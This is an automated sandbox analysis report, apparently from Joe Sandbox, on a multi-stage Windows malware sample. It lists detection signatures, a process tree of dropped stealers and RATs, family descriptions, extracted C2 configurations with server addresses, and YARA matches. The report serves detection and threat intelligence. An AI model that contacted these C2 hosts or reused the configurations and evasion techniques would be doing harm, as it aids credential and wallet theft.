Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1520057
MD5:	49a9681922ad571a4a24b42465e5cdc4
SHA1:	f710153121bcde5e6acd4760001d916675973475
SHA256:	c66b9636df8b16d69170b47f28611d70194925cd941c0a7ed49a6f35a599dad6
Tags:	exeuser-Bitsight
Infos:

Detection

LummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Socks5Systemz

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Amadeys stealer DLL

Yara detected CryptOne packer

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected PureLog Stealer

Yara detected RedLine Stealer

Yara detected Socks5Systemz

Yara detected Stealc

Yara detected Vidar stealer

Yara detected XWorm

Yara detected zgRAT

.NET source code contains potential unpacker

.NET source code contains very large array initializations

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Connects to many ports of the same IP (likely port scanning)

Contains functionality to inject code into remote processes

Creates multiple autostart registry keys

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Injects a PE file into a foreign processes

Installs new ROOT certificates

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

Potentially malicious time measurement code found

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses process hollowing technique

Sample uses string decryption to hide its real strings

Sigma detected: New RUN Key Pointing to Suspicious Folder

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Yara detected Costura Assembly Loader

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops certificate files (DER)

Enables debug privileges

Enables security privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

PE file does not import any functions

Queries disk information (often used to detect virtual machines)

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara detected Keylogger Generic

Yara signature match

Classification

Process Tree

System is w10x64

file.exe (PID: 5588 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 49A9681922AD571A4A24B42465E5CDC4)

axplong.exe (PID: 4720 cmdline: "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" MD5: 49A9681922AD571A4A24B42465E5CDC4)

axplong.exe (PID: 4564 cmdline: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe MD5: 49A9681922AD571A4A24B42465E5CDC4)

axplong.exe (PID: 5632 cmdline: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe MD5: 49A9681922AD571A4A24B42465E5CDC4)

gold.exe (PID: 2972 cmdline: "C:\Users\user\AppData\Local\Temp\1000002001\gold.exe" MD5: 389881B424CF4D7EC66DE13F01C7232A)

conhost.exe (PID: 7088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 5580 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

12dsvc.exe (PID: 3724 cmdline: "C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe" MD5: 84263AB03B0A0F2B51CC11B93EC49C9F)

conhost.exe (PID: 1216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 1712 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

qKLAD7yUjj.exe (PID: 5600 cmdline: "C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe" MD5: A3EF9920A91B891837705E46BB26DE17)

hjhTHr6fWy.exe (PID: 1856 cmdline: "C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe" MD5: 4E60F3FD76D9EAB244F9DC00F7765B0B)

Nework.exe (PID: 4524 cmdline: "C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe" MD5: F5D7B79EE6B6DA6B50E536030BCC3B59)

Hkbsse.exe (PID: 4220 cmdline: "C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe" MD5: F5D7B79EE6B6DA6B50E536030BCC3B59)

stealc_default2.exe (PID: 528 cmdline: "C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe" MD5: 7A02AA17200AEAC25A375F290A4B4C95)

needmoney.exe (PID: 6616 cmdline: "C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe" MD5: 7FA5C660D124162C405984D14042506F)

svchost015.exe (PID: 2000 cmdline: C:\Users\user\AppData\Local\Temp\svchost015.exe MD5: B826DD92D78EA2526E465A34324EBEEA)

penis.exe (PID: 7152 cmdline: "C:\Users\user\AppData\Local\Temp\1000254001\penis.exe" MD5: A21700718C70EC5E787AD373CB72A757)

conhost.exe (PID: 5744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

crypted.exe (PID: 2956 cmdline: "C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe" MD5: FF5AFED0A8B802D74AF1C1422C720446)

conhost.exe (PID: 2612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 2452 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 5328 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 6472 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

LummaC222222.exe (PID: 6828 cmdline: "C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe" MD5: 2F1D09F64218FFFE7243A8B44345B27E)

newbundle2.exe (PID: 6800 cmdline: "C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe" MD5: 58E8B2EB19704C5A59350D4FF92E5AB6)

rstxdhuj.exe (PID: 1216 cmdline: "C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe" MD5: 1EF39C8BC5799AA381FE093A1F2D532A)

InstallUtil.exe (PID: 4024 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

WerFault.exe (PID: 3844 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4024 -s 904 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cccc2.exe (PID: 7068 cmdline: "C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe" MD5: 6B470F7251AA9C14D7DAEA8F6446E217)

conhost.exe (PID: 1084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 4536 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 428 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

Hkbsse.exe (PID: 7040 cmdline: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe MD5: F5D7B79EE6B6DA6B50E536030BCC3B59)

stories.exe (PID: 5020 cmdline: "C:\Users\user\AppData\Local\Temp\1000065001\stories.exe" MD5: BB4417D907E43503F714273F1AE9CF44)

stories.tmp (PID: 5028 cmdline: "C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp" /SL5="$8045C,2980754,56832,C:\Users\user\AppData\Local\Temp\1000065001\stories.exe" MD5: C8AFA039FC2A7F032512686FB50692DF)

fidovideorecorder32_64.exe (PID: 3288 cmdline: "C:\Users\user\AppData\Local\Fido Video Recorder\fidovideorecorder32_64.exe" -i MD5: B19555358F3C9ABC6157B2B7AAB2F658)

svchost.exe (PID: 3372 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 3876 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

WerFault.exe (PID: 6452 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4024 -ip 4024 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/ https://censys.com/a-beginners-guide-to-hunting-open-directories/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: StealC

{"C2 url": "http://91.202.233.158/e96ea2db21fa9a1b.php", "Botnet": "default"}

Threatname: LummaC

{"C2 url": ["lootebarrkeyn.shop", "ghostreedmnu.shop", "fragnantbui.shop", "vozmeatillu.shop", "stogeneratmns.shop", "reinforcenh.shop", "offensivedzvju.shop", "gutterydhowi.shop", "drawzhotdog.shop"], "Build id": "FATE99--Mix"}

Threatname: Xworm

{"C2 url": ["188.190.10.161"], "Port": "4444", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Threatname: Vidar

{"C2 url": "http://91.202.233.158/e96ea2db21fa9a1b.php", "Botnet": "default"}

Threatname: Amadey

{"C2 url": "185.215.113.16/Jo89Ku7d/index.php", "Version": "4.41", "Install Folder": "44111dbc49", "Install File": "axplong.exe"}

Threatname: RedLine

{"C2 url": "95.179.250.45:26212", "Bot Id": "LiveTraffic", "Message": "Error! Disable antivirus and try again!", "Authorization Header": "143feb5082f9936e624c1e27545e7d19"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\penis[1].exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\penis[1].exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\penis[1].exe	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x58801:$s1: file:/// 0x58739:$s2: {11111-22222-10009-11112} 0x58791:$s3: {11111-22222-50001-00000} 0x54fb8:$s4: get_Module 0x4ec48:$s5: Reverse 0x4fa7a:$s6: BlockCopy 0x4eb63:$s7: ReadByte 0x58813:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x58801:$s1: file:/// 0x58739:$s2: {11111-22222-10009-11112} 0x58791:$s3: {11111-22222-50001-00000} 0x54fb8:$s4: get_Module 0x4ec48:$s5: Reverse 0x4fa7a:$s6: BlockCopy 0x4eb63:$s7: ReadByte 0x58813:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\stealc_default2[1].exe	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\stealc_default2[1].exe	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\newbundle2[1].exe	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Nework[1].exe	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
C:\Users\user\AppData\Local\Temp\svchost015.exe	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
C:\Users\user\AppData\Local\Temp\svchost015.exe	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
Click to see the 13 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.2137528658.00000000006D1000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000020.00000002.3006538986.0000000000A9E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000007.00000002.2695505270.00000000037A5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000013.00000002.2994583849.000000000079E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000013.00000000.2774274390.0000000000F51000.00000080.00000001.01000000.00000012.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000011.00000000.2765127201.0000000000211000.00000020.00000001.01000000.00000011.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000006.00000003.2660197463.0000000005270000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000009.00000002.2858375876.0000000000421000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000016.00000002.2960319681.0000000003119000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Crypt	Yara detected CryptOne packer	Joe Security
00000024.00000002.3118723302.0000000004141000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000024.00000002.3118723302.0000000004141000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x148345:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x1483e2:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x1484f7:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x147ed7:$cnc4: POST / HTTP/1.1
00000013.00000002.2996521135.0000000000F51000.00000080.00000001.01000000.00000012.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000024.00000002.3164599118.0000000006610000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000025.00000002.3332091327.0000000000802000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000025.00000002.3332091327.0000000000802000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8775:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x8812:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8927:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x8307:$cnc4: POST / HTTP/1.1
00000000.00000002.2100199009.0000000000D71000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000024.00000002.3009810672.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000016.00000002.2972396756.0000000003740000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000016.00000002.2971489446.0000000003710000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000003.2059876359.00000000051F0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000020.00000000.2916373422.0000000000401000.00000020.00000001.01000000.0000001E.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
00000023.00000000.2951592112.0000000000C41000.00000002.00000001.01000000.00000022.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000002.00000003.2092244359.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000001B.00000002.2955093646.0000000003A05000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000017.00000002.3340691563.000000000279D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Socks5Systemz	Yara detected Socks5Systemz	Joe Security
00000012.00000000.2770476347.0000000000211000.00000020.00000001.01000000.00000011.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000012.00000002.3331845995.0000000000211000.00000020.00000001.01000000.00000011.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000003.00000003.2097277338.0000000004EE0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000001F.00000002.3088502787.0000000000423000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000002.00000002.2132657383.00000000006D1000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000010.00000000.2751757055.0000000000191000.00000020.00000001.01000000.0000000F.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000F.00000000.2743413238.0000000000982000.00000002.00000001.01000000.0000000E.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000011.00000002.2769327231.0000000000211000.00000020.00000001.01000000.00000011.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000024.00000002.3009810672.0000000003211000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000024.00000002.3009810672.0000000003211000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x87485:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x87522:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x87637:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x87017:$cnc4: POST / HTTP/1.1
0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000018.00000000.2860928710.0000000000CA2000.00000002.00000001.01000000.00000019.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000023.00000002.3153539765.00000000031B0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000F.00000002.2936243800.0000000002F1B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: gold.exe PID: 2972	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 5580	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 5580	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 1712	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: hjhTHr6fWy.exe PID: 1856	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: hjhTHr6fWy.exe PID: 1856	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: stealc_default2.exe PID: 528	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: stealc_default2.exe PID: 528	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: stealc_default2.exe PID: 528	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: stealc_default2.exe PID: 528	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: stealc_default2.exe PID: 528	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: needmoney.exe PID: 6616	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: needmoney.exe PID: 6616	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: fidovideorecorder32_64.exe PID: 3288	JoeSecurity_Socks5Systemz	Yara detected Socks5Systemz	Joe Security
Process Memory Space: penis.exe PID: 7152	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
